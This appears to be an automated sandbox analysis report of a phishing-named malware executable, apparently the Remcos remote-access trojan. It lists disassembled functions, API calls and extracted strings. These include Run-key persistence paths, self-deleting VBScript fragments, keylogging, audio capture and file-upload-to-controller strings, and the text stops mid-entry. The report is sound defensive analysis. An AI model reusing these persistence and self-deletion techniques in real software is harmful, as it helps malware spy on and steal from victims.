                            Similarity
                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                            • API String ID: 4250697656-2665858469
                            • Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                            • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                            • Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                            • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                            Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                            • ExitProcess.KERNEL32 ref: 0040C63E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                            • API String ID: 1861856835-3168347843
                            • Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                            • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                            • Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                            • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                            Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                            • ExitProcess.KERNEL32 ref: 0040C287
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                            • API String ID: 3797177996-1998216422
                            • Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                            • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                            • Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                            • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                            Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                            • SetEvent.KERNEL32 ref: 0041A39A
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                            • CloseHandle.KERNEL32 ref: 0041A3BB
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                            • API String ID: 738084811-1408154895
                            • Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                            • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                            • Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                            • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                            Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            • API String ID: 1602526932-4212202414
                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                            Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000001,004068B2,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                            • API String ID: 1646373207-3129417747
                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                            Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 0040BC75
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                            • _wcslen.LIBCMT ref: 0040BD54
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000000,00000000), ref: 0040BDF2
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                            • _wcslen.LIBCMT ref: 0040BE34
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                            • ExitProcess.KERNEL32 ref: 0040BED0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                            • String ID: 6$C:\Users\user\Desktop\RFQ-20241230.pif.exe$del$open$BG$BG
                            • API String ID: 1579085052-3434148781
                            • Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                            • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                            • Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                            • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                            Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 0041B1E6
                            • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                            • lstrlenW.KERNEL32(?), ref: 0041B217
                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                            • _wcslen.LIBCMT ref: 0041B2EB
                            • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                            • GetLastError.KERNEL32 ref: 0041B323
                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                            • lstrcatW.KERNEL32(?,?), ref: 0041B369
                            • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                            • GetLastError.KERNEL32 ref: 0041B380
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                            • String ID: ?
                            • API String ID: 3941738427-1684325040
                            • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                            • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                            • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                            • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                            Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$EnvironmentVariable$_wcschr
                            • String ID:
                            • API String ID: 3899193279-0
                            • Opcode ID: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
                            • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                            • Opcode Fuzzy Hash: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
                            • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                            Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                            • Sleep.KERNEL32(00000064), ref: 00412060
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$HDG$HDG$>G$>G
                            • API String ID: 1223786279-3931108886
                            • Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                            • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                            • Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                            • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                            Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                            • API String ID: 2490988753-744132762
                            • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                            • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                            • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                            • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                            Function 0041B834 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                            • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            • API String ID: 1332880857-3714951968
                            • Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                            • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                            • Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                            • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                            Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                            Download Yara Rule
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040A456
                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                            • GetForegroundWindow.USER32 ref: 0040A467
                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                            • API String ID: 911427763-1497357211
                            • Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                            • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                            • Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                            • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                            Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                            Download Yara Rule
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                            • GetCursorPos.USER32(?), ref: 0041CB08
                            • SetForegroundWindow.USER32(?), ref: 0041CB11
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                            • ExitProcess.KERNEL32 ref: 0041CB84
                            • CreatePopupMenu.USER32 ref: 0041CB8A
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            • API String ID: 1657328048-3535843008
                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                            • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                            • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                            Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$Info
                            • String ID:
                            • API String ID: 2509303402-0
                            • Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                            • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                            • Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                            • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                            Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                            • __aulldiv.LIBCMT ref: 00407FE9
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                            • API String ID: 1884690901-3066803209
                            • Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                            • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                            • Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                            • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                            Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                            Download Yara Rule
                            APIs
